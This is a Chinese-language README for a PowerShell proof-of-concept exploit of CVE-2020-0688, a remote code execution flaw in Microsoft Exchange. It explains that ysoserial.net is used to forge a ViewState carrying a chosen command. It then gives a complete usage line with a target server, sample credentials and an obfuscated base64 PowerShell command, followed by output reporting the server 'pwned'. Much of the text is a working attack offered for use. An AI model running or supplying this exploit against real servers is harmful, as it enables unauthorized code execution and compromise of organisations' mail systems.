
使用 PowerShell 编写的 Forgot2kEyXCHANGE (CVE-2020-0688) 的 PoC
用于 Forgot2kEyXCHANGE (CVE-2020-0688) 的 PoC,使用 PowerShell 编写
此 PoC 需要有效的用户名和密码。
此 PoC 使用 ysoserial.net 创建新的 ViewState,其中包含您通过 -Command 参数指定的命令。 如果您的系统上尚未安装此工具,请在此处下载。
PS> . .\PSForgot2kEyXCHANGE.ps1
PS> Invoke-Forgot2kEyXCHANG -Server 'https://webmail.domain.tld' -User '[email protected]' -Password 'Summer2020!' -Command 'cmd /c powershell.exe -en dwByAGkAdABlAC0AaABvAHMAdAAgACcASQAnAG0AIABhACAAcwB0AGkAbgBrAHkAIABzAGsAaQBkACAAdwBoAG8AIAByAHUAbgBzACAAcgBhAG4AZABvAG0AIABjAG8AZABlACAAOgApACcA=' -YsoserialPath 'C:\tools\ysoserial.net\ysoserial.exe'
[+] Login successfully!
[+] Generated new ViewState successfully!
[+] Got a 500 response, successfully pwned https://webmail.domain.tld !
欢迎提出问题、贡献代码并提交您的拉取请求。您也可以在 Twitter 上 @我 (@JustinPerdok)。